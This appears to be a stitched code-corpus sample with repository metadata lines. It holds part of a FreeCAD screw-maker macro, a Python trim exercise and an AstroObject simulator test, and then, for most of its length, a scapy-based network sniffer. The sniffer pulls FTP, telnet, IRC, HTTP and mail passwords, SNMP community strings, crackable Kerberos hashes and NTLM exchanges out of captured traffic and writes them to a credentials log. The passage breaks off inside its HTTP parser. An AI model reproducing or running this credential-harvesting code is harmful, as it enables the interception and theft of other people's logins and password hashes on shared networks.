hFace = Part.Face(hWire)
roundtool = hFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# create hexagon
mhex = Base.Matrix()
mhex.rotateZ(math.radians(60.0))
polygon = []
vhex = Base.Vector(s_a / math.sqrt(3.0), 0.0, 1.0)
for i in range(6):
polygon.append(vhex)
vhex = mhex.multiply(vhex)
polygon.append(vhex)
hexagon = Part.makePolygon(polygon)
hexFace = Part.Face(hexagon)
solidHex = hexFace.extrude(Base.Vector(0.0, 0.0, hex_depth))
allen = solidHex.cut(roundtool)
# Part.show(allen)
allenFaces = [allen.Faces[0]]
for i in range(2, len(allen.Faces)):
allenFaces.append(allen.Faces[i])
allenShell = Part.Shell(allenFaces)
solidHex.Placement.Base = Base.Vector(0.0, 0.0, h_a)
allenShell.Placement.Base = Base.Vector(0.0, 0.0, h_a)
return solidHex, allenShell
# ISO 10664 Hexalobular internal driving feature for bolts and screws
def makeIso10664_3(self, RType='T20', t_hl=3.0, h_hl=0):
# t_hl depth of the recess
# h_hl top height location of Cutting tool
A, B, Re = FsData["iso10664def"][RType]
sqrt_3 = math.sqrt(3.0)
depth = A / 4.0
offSet = 1.0
# Chamfer cutter for the hexalobular recess
PntH1 = Base.Vector(0.0, 0.0, -t_hl - depth - 1.0)
# PntH2 = Base.Vector(A/2.0*1.02,0.0,-t_hl-depth-1.0)
# PntH3 = Base.Vector(A/2.0*1.02,0.0,-t_hl)
PntH2 = Base.Vector(A, 0.0, -t_hl - depth - 1.0)
PntH3 = Base.Vector(A, 0.0, -t_hl + depth)
PntH4 = Base.Vector(0.0, 0.0, -t_hl - depth)
# Points for an arc at the peak of the cone
rCone = A / 4.0
hyp = (depth * math.sqrt(A ** 2 / depth ** 2 + 1.0) * rCone) / A
radAlpha = math.atan(A / depth)
radBeta = math.pi / 2.0 - radAlpha
zrConeCenter = hyp - depth - t_hl
xArc1 = math.sin(radBeta) * rCone
zArc1 = zrConeCenter - math.cos(radBeta) * rCone
xArc2 = math.sin(radBeta / 2.0) * rCone
zArc2 = zrConeCenter - math.cos(radBeta / 2.0) * rCone
zArc3 = zrConeCenter - rCone
PntA1 = Base.Vector(xArc1, 0.0, zArc1)
PntA2 = Base.Vector(xArc2, 0.0, zArc2)
PntA3 = Base.Vector(0.0, 0.0, zArc3)
edgeA1 = Part.Arc(PntA1, PntA2, PntA3).toShape()
edgeH1 = Part.makeLine(PntH1, PntH2)
edgeH2 = Part.makeLine(PntH2, PntH3)
edgeH3 = Part.makeLine(PntH3, PntA1)
edgeH4 = Part.makeLine(PntA3, PntH1)
hWire = Part.Wire([edgeH1, edgeH2, edgeH3, edgeA1])
cutShell = hWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
cutTool = Part.Solid(cutShell)
Ri = -((B + sqrt_3 * (2. * Re - A)) * B + (A - 4. * Re) * A) / (4. * B - 2. * sqrt_3 * A + (4. * sqrt_3 - 8.) * Re)
# print '2nd Ri last solution: ', Ri
beta = math.acos(A / (4 * Ri + 4 * Re) - (2 * Re) / (4 * Ri + 4 * Re)) - math.pi / 6
# print 'beta: ', beta
Rh = (sqrt_3 * (A / 2.0 - Re)) / 2.0
Re_x = A / 2.0 - Re + Re * math.sin(beta)
Re_y = Re * math.cos(beta)
Ri_y = B / 4.0
Ri_x = sqrt_3 * B / 4.0
mhex = Base.Matrix()
mhex.rotateZ(math.radians(60.0))
hexlobWireList = []
PntRe0 = Base.Vector(Re_x, -Re_y, offSet)
PntRe1 = Base.Vector(A / 2.0, 0.0, offSet)
PntRe2 = Base.Vector(Re_x, Re_y, offSet)
edge0 = Part.Arc(PntRe0, PntRe1, PntRe2).toShape()
# Part.show(edge0)
hexlobWireList.append(edge0)
PntRi = Base.Vector(Ri_x, Ri_y, offSet)
PntRi2 = mhex.multiply(PntRe0)
edge1 = Part.Arc(PntRe2, PntRi, PntRi2).toShape()
# Part.show(edge1)
hexlobWireList.append(edge1)
for i in range(5):
PntRe1 = mhex.multiply(PntRe1)
PntRe2 = mhex.multiply(PntRe2)
edge0 = Part.Arc(PntRi2, PntRe1, PntRe2).toShape()
hexlobWireList.append(edge0)
PntRi = mhex.multiply(PntRi)
PntRi2 = mhex.multiply(PntRi2)
if i == 5:
edge1 = Part.Arc(PntRe2, PntRi, PntRe0).toShape()
else:
edge1 = Part.Arc(PntRe2, PntRi, PntRi2).toShape()
hexlobWireList.append(edge1)
hexlobWire = Part.Wire(hexlobWireList)
# Part.show(hWire)
face = Part.Face(hexlobWire)
# Extrude in z to create the cutting tool for the screw-head-face
Helo = face.extrude(Base.Vector(0.0, 0.0, -t_hl - depth - offSet))
# Make the recess-shell for the screw-head-shell
hexlob = Helo.cut(cutTool)
# Part.show(hexlob)
hexlobFaces = [hexlob.Faces[0]]
for i in range(2, 15):
hexlobFaces.append(hexlob.Faces[i])
hexlobShell = Part.Shell(hexlobFaces)
hexlobShell.Placement.Base = Base.Vector(0.0, 0.0, h_hl)
Helo.Placement.Base = Base.Vector(0.0, 0.0, h_hl)
return Helo, hexlobShell
def setThreadType(self, TType='simple'):
self.simpThread = False
self.symThread = False
self.rThread = False
if TType == 'simple':
self.simpThread = True
if TType == 'symbol':
self.symThread = True
if TType == 'real':
self.rThread = True
def setTuner(self, myTuner=511):
self.Tuner = myTuner
def getDia(self, ThreadType, isNut):
threadstring = ThreadType.strip("()")
dia = FsData["DiaList"][threadstring][0]
if self.sm3DPrintMode:
if isNut:
dia = self.smNutThrScaleA * dia + self.smNutThrScaleB
else:
dia = self.smScrewThrScaleA * dia + self.smScrewThrScaleB
return dia
def getLength(self, LenStr):
# washers and nuts pass an int (1), for their unused length attribute
# handle this circumstance if necessary
if type(LenStr) == int:
return LenStr
# otherwise convert the string to a number using predefined rules
if 'in' not in LenStr:
LenFloat = float(LenStr)
else:
components = LenStr.strip('in').split(' ')
total = 0
for item in components:
if '/' in item:
subcmpts = item.split('/')
total += float(subcmpts[0]) / float(subcmpts[1])
else:
total += float(item)
LenFloat = total * 25.4
return LenFloat
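    # Worked example (illustrative only): following the rules above,
    # getLength('1 1/2in') sums 1 + 1/2 inches and multiplies by 25.4,
    # giving 38.1 (mm); getLength('25') simply returns 25.0; and
    # getLength(1) is passed through unchanged.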
class ScrewMacro(object):
d = QtGui.QWidget()
d.ui = Ui_ScrewMaker()
d.ui.setupUi(d)
if __name__ == '__main__':
d.show()
def main():
o = ScrewMacro()
if __name__ == '__main__':
main()
| shaise/FreeCAD_FastenersWB | screw_maker.py | Python | gpl-2.0 | 194,972 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Use Python's slicing feature to implement a trim-like method that strips spaces from both ends of a string
def trim1(s):
"""利用迭代来实现"""
if s[:1] != " " and s[-1:] != " ":
return s
elif s[:1] == " ":
return trim1(s[1:])
elif s[-1:] == " ":
return trim1(s[:-1])
def trim(s):
"""更简洁的利用循环来实现"""
while s[:1] == " ":
s = s[1:]
while s[-1:] == " ":
s = s[:-1]
return s
# Tests
if trim('hello ') != 'hello':
    print('Test failed!')
elif trim(' hello') != 'hello':
    print('Test failed!')
elif trim(' hello ') != 'hello':
    print('Test failed!')
elif trim(' hello world ') != 'hello world':
    print('Test failed!')
elif trim('') != '':
    print('Test failed!')
elif trim(' ') != '':
    print('Test failed!')
else:
    print('Test passed!')
| felix9064/python | Demo/liaoxf/slice_trim.py | Python | mit | 903 |
# -*- coding: utf-8 -*-
#
# Test_simulator.py
# AstroObject
#
# Created by Alexander Rudy on 2012-01-11.
# Copyright 2012 Alexander Rudy. All rights reserved.
# Version 0.6.1
#
from tests.apitests import *
import AstroObject.simulator as AS
from AstroObject.cache import *
import nose.tools as nt
from nose.plugins.skip import Skip,SkipTest
import numpy as np
import pyfits as pf
import scipy as sp
import matplotlib as mpl
import matplotlib.pyplot as plt
import os
import logging
class test_Simulator(API_Base):
"""AstroObject.simulator"""
attributes = ["SIMULATOR"]
def setup(self):
"""Set up the simulator"""
self.SIMULATOR = AS.Simulator("Tester")
super(test_Simulator, self).setup()
def test_registerStage(self):
"""registerStage()"""
self.SIMULATOR.registerStage(abs,"abs")
assert "abs" in self.SIMULATOR.stages
class test_SimulatorFunctional(object):
"""Functional tests for simulator"""
def stest_BasicSimulation(self):
"""A very simple simulation with caching"""
SIM = AS.Simulator(name="Loggy",commandLine=False)
class SimpleStage(object):
def __init__(self,SIM):
super(SimpleStage, self).__init__()
self.name = "SimpleStage"
self.sim = SIM
def run(self):
print "Hello from %s Object" % self.name
img = self.sim.Caches["Random Image"]
self.A = img[0,0]
def other(self):
"""Other Stage Function"""
print "Hello from %s Stage" % "other"
img = self.sim.Caches["Random NPY"]
self.B = img[1,1]
def last(self):
"""Last Stage Function"""
print "Last Stage"
img = self.sim.Caches["Random Image"]
self.C = img[0,0]
def save(self,data):
"""Saves some cache data"""
np.save("Caches/Test.npy",data)
def cache(self):
"""Cache this image"""
return np.random.normal(10,2,(1000,1000))
def load(self):
"""Load the image"""
return np.load("Caches/Test.npy")
stage = SimpleStage(SIM)
log = logging.getLogger("Loggy")
log.useConsole(False)
SIM.registerStage(stage.run,name="examp",description="Example Stage",include=True)
SIM.registerStage(stage.other,name="other",description="Other Stage",include=True)
SIM.registerStage(stage.last,name="last",description="Last Stage",include=True)
SIM.registerStage(None,"ex",dependencies=["examp","other"],help="example Macro")
SIM.Caches["Random Image"] = Cache(stage.cache,stage.load,stage.save)
SIM.Caches["Random NPY"] = NumpyCache(stage.cache,"Caches/Random.npy")
SIM.Caches.clear()
SIM.startup()
SIM.do("all")
log.useConsole(True)
assert stage.A == stage.C
assert stage.A != stage.B
assert stage.B != stage.C
| alexrudy/AstroObject | tests/test_simulator.py | Python | gpl-3.0 | 3,211 |
#!/usr/bin/env python2
from os import geteuid, devnull
import logging
# shut up scapy
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
conf.verb=0
from sys import exit
import binascii
import struct
import argparse
import signal
import base64
from urllib import unquote
from subprocess import Popen, PIPE
from collections import OrderedDict
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
from urllib import unquote
import binascii
# Debug
#from IPython import embed
##########################
# Potential ToDo:
# MySQL seed:hash
# VNC
# Oracle?
# Add file carving from dissectors.py
#########################
# Unintentional code contributors:
# Laurent Gaffie
# psychomario
logging.basicConfig(filename='credentials.txt',level=logging.INFO)
DN = open(devnull, 'w')
pkt_frag_loads = OrderedDict()
challenge_acks = OrderedDict()
mail_auths = OrderedDict()
telnet_stream = OrderedDict()
# Regexs
authenticate_re = '(www-|proxy-)?authenticate'
authorization_re = '(www-|proxy-)?authorization'
ftp_user_re = r'USER (.+)\r\n'
ftp_pw_re = r'PASS (.+)\r\n'
irc_user_re = r'NICK (.+?)((\r)?\n|\s)'
irc_pw_re = r'NS IDENTIFY (.+)'
irc_pw_re2 = 'nickserv :identify (.+)'
mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)'
mail_auth_re1 = '(\d+ )?login '
NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+'
NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
# Prone to false+ but prefer that to false-
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
#Console colors
W = '\033[0m' # white (normal)
T = '\033[93m' # tan
def parse_args():
"""Create the arguments"""
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--interface", help="Choose an interface")
parser.add_argument("-p", "--pcap", help="Parse info from a pcap file; -p <pcapfilename>")
parser.add_argument("-f", "--filterip", help="Do not sniff packets from this IP address; -f 192.168.0.4")
parser.add_argument("-v", "--verbose", help="Display entire URLs and POST loads rather than truncating at 100 characters", action="store_true")
return parser.parse_args()
def iface_finder():
try:
ipr = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
for line in ipr.communicate()[0].splitlines():
if 'default' in line:
l = line.split()
iface = l[4]
return iface
except IOError:
exit('[-] Could not find an internet active interface; please specify one with -i <interface>')
def frag_remover(ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
global pkt_frag_loads
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep the load less than 75,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
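# A minimal illustrative sketch of how frag_joiner() accumulates TCP fragments
# under a single ack key. The address and payloads are fabricated, this helper
# is never called by the tool itself, and calling it mutates the global
# pkt_frag_loads store.
def _demo_frag_joiner():
    src = '10.0.0.1:5555'
    pkt_frag_loads[src] = frag_joiner('100', src, 'USER dan')
    pkt_frag_loads[src] = frag_joiner('100', src, '\r\nPASS hunter2\r\n')
    # Both fragments now live under ack '100' as one concatenated load
    return pkt_frag_loads[src]['100']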
def pkt_parser(pkt):
'''
Start parsing packets here
'''
global pkt_frag_loads, mail_auths
if pkt.haslayer(Raw):
load = pkt[Raw].load
# Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
return
# UDP
if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
# SNMP community strings
if pkt.haslayer(SNMP):
parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP])
return
# Kerberos over UDP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5UDP(decoded['data'][8:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# TCP
elif pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
ack = str(pkt[TCP].ack)
seq = str(pkt[TCP].seq)
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
frag_remover(ack, load)
pkt_frag_loads[src_ip_port] = frag_joiner(ack, src_ip_port, load)
full_load = pkt_frag_loads[src_ip_port][ack]
# Limit the packets we regex to increase efficiency
# 750 is a bit arbitrary but some SMTP auth success pkts
# are 500+ characters
if 0 < len(full_load) < 750:
# FTP
ftp_creds = parse_ftp(full_load, dst_ip_port)
if len(ftp_creds) > 0:
for msg in ftp_creds:
printer(src_ip_port, dst_ip_port, msg)
return
# Mail
mail_creds_found = mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq)
# IRC
irc_creds = irc_logins(full_load, pkt)
if irc_creds != None:
printer(src_ip_port, dst_ip_port, irc_creds)
return
# Telnet
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
# HTTP and other protocols that run on TCP + a raw load
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, parse_args().verbose)
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
'''
Catch telnet logins and passwords
'''
global telnet_stream
msg = None
if src_ip_port in telnet_stream:
# Do a utf decode in case the client sends telnet options before their username
# No one would care to see that
try:
telnet_stream[src_ip_port] += load.decode('utf8')
except UnicodeDecodeError:
pass
# \r or \r\n or \n terminate commands in telnet if my pcaps are to be believed
if '\r' in telnet_stream[src_ip_port] or '\n' in telnet_stream[src_ip_port]:
telnet_split = telnet_stream[src_ip_port].split(' ', 1)
cred_type = telnet_split[0]
value = telnet_split[1].replace('\r\n', '').replace('\r', '').replace('\n', '')
# Create msg, the return variable
msg = 'Telnet %s: %s' % (cred_type, value)
printer(src_ip_port, dst_ip_port, msg)
del telnet_stream[src_ip_port]
# This part relies on the telnet packet ending in
# "login:", "password:", or "username:" and being <750 chars
# Haven't seen any false+ but this is pretty general
# might catch some eventually
# maybe use dissector.py telnet lib?
if len(telnet_stream) > 100:
telnet_stream.popitem(last=False)
mod_load = load.lower().strip()
if mod_load.endswith('username:') or mod_load.endswith('login:'):
telnet_stream[dst_ip_port] = 'username '
elif mod_load.endswith('password:'):
telnet_stream[dst_ip_port] = 'password '
def ParseMSKerbv5TCP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[47:48])[0]
Hash = Data[48:48+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
Name = Data[HashLen+97:HashLen+97+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
def ParseMSKerbv5UDP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[17:18]
EncType = Data[39:40]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17":
try:
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
HashLen = struct.unpack('<b',Data[48:49])[0]
Hash = Data[49:49+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
Name = Data[HashLen+98:HashLen+98+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
except struct.error:
return
def Decode_Ip_Packet(s):
'''
Taken from PCredz, solely to get Kerb parsing
working until I have time to analyze Kerb pkts
and figure out a simpler way
Maybe use kerberos python lib
'''
d={}
d['header_len']=ord(s[0]) & 0x0f
d['data']=s[4*d['header_len']:]
return d
def double_line_checker(full_load, count_str):
'''
Check if count_str shows up twice
'''
num = full_load.lower().count(count_str)
if num > 1:
lines = full_load.count('\r\n')
if lines > 1:
full_load = full_load.split('\r\n')[-2] # -1 is ''
return full_load
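# A minimal illustrative sketch of double_line_checker(); the sample load is
# fabricated and this helper is never called by the tool itself.
def _demo_double_line_checker():
    # Two USER lines arrive in one load; only the last complete line,
    # 'USER b', is kept (the count string is matched against the lowercased load)
    return double_line_checker('USER a\r\nUSER b\r\n', 'user')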
def parse_ftp(full_load, dst_ip_port):
'''
Parse out FTP creds
'''
print_strs = []
# Sometimes FTP packets double up on the authentication lines
    # We just want the latest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
full_load = double_line_checker(full_load, 'USER')
    # FTP and POP potentially use identical client > server auth pkts
ftp_user = re.match(ftp_user_re, full_load)
ftp_pass = re.match(ftp_pw_re, full_load)
if ftp_user:
msg1 = 'FTP User: %s' % ftp_user.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
elif ftp_pass:
msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
return print_strs
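# A minimal illustrative sketch of parse_ftp() against a fabricated FTP login
# fragment; the username and address are made up and this helper is never
# called by the tool itself.
def _demo_parse_ftp():
    msgs = parse_ftp('USER alice\r\n', '10.0.0.2:21')
    # msgs == ['FTP User: alice']; a nonstandard destination port would add a warning line
    return msgs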
def mail_decode(src_ip_port, dst_ip_port, mail_creds):
'''
Decode base64 mail creds
'''
try:
decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
decoded = decoded.replace('\x00', ' ')
except TypeError:
decoded = None
except UnicodeDecodeError as e:
decoded = None
if decoded != None:
msg = 'Decoded: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
def mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq):
'''
Catch IMAP, POP, and SMTP logins
'''
# Handle the first packet of mail authentication
# if the creds aren't in the first packet, save it in mail_auths
# mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]
global mail_auths
found = False
# Sometimes mail packets double up on the authentication lines
    # We just want the latest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
full_load = double_line_checker(full_load, 'auth')
# Client to server 2nd+ pkt
if src_ip_port in mail_auths:
if seq in mail_auths[src_ip_port][-1]:
stripped = full_load.strip('\r\n')
try:
decoded = base64.b64decode(stripped)
msg = 'Mail authentication: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
except TypeError:
pass
mail_auths[src_ip_port].append(ack)
# Server responses to client
# seq always = last ack of tcp stream
elif dst_ip_port in mail_auths:
if seq in mail_auths[dst_ip_port][-1]:
# Look for any kind of auth failure or success
a_s = 'Authentication successful'
a_f = 'Authentication failed'
# SMTP auth was successful
if full_load.startswith('235') and 'auth' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# SMTP failed
elif full_load.startswith('535 '):
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP/POP/SMTP failed
elif ' fail' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP auth success
elif ' OK [' in full_load:
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# Pkt was not an auth pass/fail so its just a normal server ack
# that it got the client's first auth pkt
else:
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[dst_ip_port].append(ack)
# Client to server but it's a new TCP seq
# This handles most POP/IMAP/SMTP logins but there's at least one edge case
else:
mail_auth_search = re.match(mail_auth_re, full_load, re.IGNORECASE)
if mail_auth_search != None:
auth_msg = full_load
# IMAP uses the number at the beginning
if mail_auth_search.group(1) != None:
auth_msg = auth_msg.split()[1:]
else:
auth_msg = auth_msg.split()
# Check if its a pkt like AUTH PLAIN dvcmQxIQ==
# rather than just an AUTH PLAIN
if len(auth_msg) > 2:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Mail authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
try:
del mail_auths[src_ip_port]
except KeyError:
pass
found = True
# Mail auth regex was found and src_ip_port is not in mail_auths
# Pkt was just the initial auth cmd, next pkt from client will hold creds
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[src_ip_port] = [ack]
# At least 1 mail login style doesn't fit in the original regex:
# 1 login "username" "password"
# This also catches FTP authentication!
# 230 Login successful.
elif re.match(mail_auth_re1, full_load, re.IGNORECASE) != None:
# FTP authentication failures trigger this
#if full_load.lower().startswith('530 login'):
# return
auth_msg = full_load
auth_msg = auth_msg.split()
if 2 < len(auth_msg) < 5:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
found = True
if found == True:
return True
def irc_logins(full_load, pkt):
'''
Find IRC logins
'''
user_search = re.match(irc_user_re, full_load)
pass_search = re.match(irc_pw_re, full_load)
pass_search2 = re.search(irc_pw_re2, full_load.lower())
if user_search:
msg = 'IRC nick: %s' % user_search.group(1)
return msg
if pass_search:
msg = 'IRC pass: %s' % pass_search.group(1)
return msg
if pass_search2:
msg = 'IRC pass: %s' % pass_search2.group(1)
return msg
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
'''
Pull out pertinent info from the parsed HTTP packet data
'''
user_passwd = None
http_url_req = None
method = None
http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
http_line, header_lines, body = parse_http_load(full_load, http_methods)
headers = headers_to_dict(header_lines)
if 'host' in headers:
host = headers['host']
else:
host = ''
if http_line != None:
method, path = parse_http_line(http_line, http_methods)
http_url_req = get_http_url(method, host, path, headers)
if http_url_req != None:
if verbose == False:
if len(http_url_req) > 98:
http_url_req = http_url_req[:99] + '...'
printer(src_ip_port, None, http_url_req)
# Print search terms
searched = get_http_searches(http_url_req, body, host)
if searched:
printer(src_ip_port, dst_ip_port, searched)
# Print user/pwds
if body != '':
user_passwd = get_login_pass(body)
if user_passwd != None:
try:
http_user = user_passwd[0].decode('utf8')
http_pass = user_passwd[1].decode('utf8')
# Set a limit on how long they can be prevent false+
if len(http_user) > 75 or len(http_pass) > 75:
return
user_msg = 'HTTP username: %s' % http_user
printer(src_ip_port, dst_ip_port, user_msg)
pass_msg = 'HTTP password: %s' % http_pass
printer(src_ip_port, dst_ip_port, pass_msg)
except UnicodeDecodeError:
pass
# Print POST loads
# ocsp is a common SSL post load that's never interesting
if method == 'POST' and 'ocsp.' not in host:
try:
if verbose == False and len(body) > 99:
# If it can't decode to utf8 we're probably not interested in it
msg = 'POST load: %s...' % body[:99].encode('utf8')
else:
msg = 'POST load: %s' % body.encode('utf8')
printer(src_ip_port, None, msg)
except UnicodeDecodeError:
pass
# Kerberos over TCP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5TCP(decoded['data'][20:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
    # Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC, SMBv1/2, LDAP)
NTLMSSP2 = re.search(NTLMSSP2_re, full_load, re.DOTALL)
NTLMSSP3 = re.search(NTLMSSP3_re, full_load, re.DOTALL)
if NTLMSSP2:
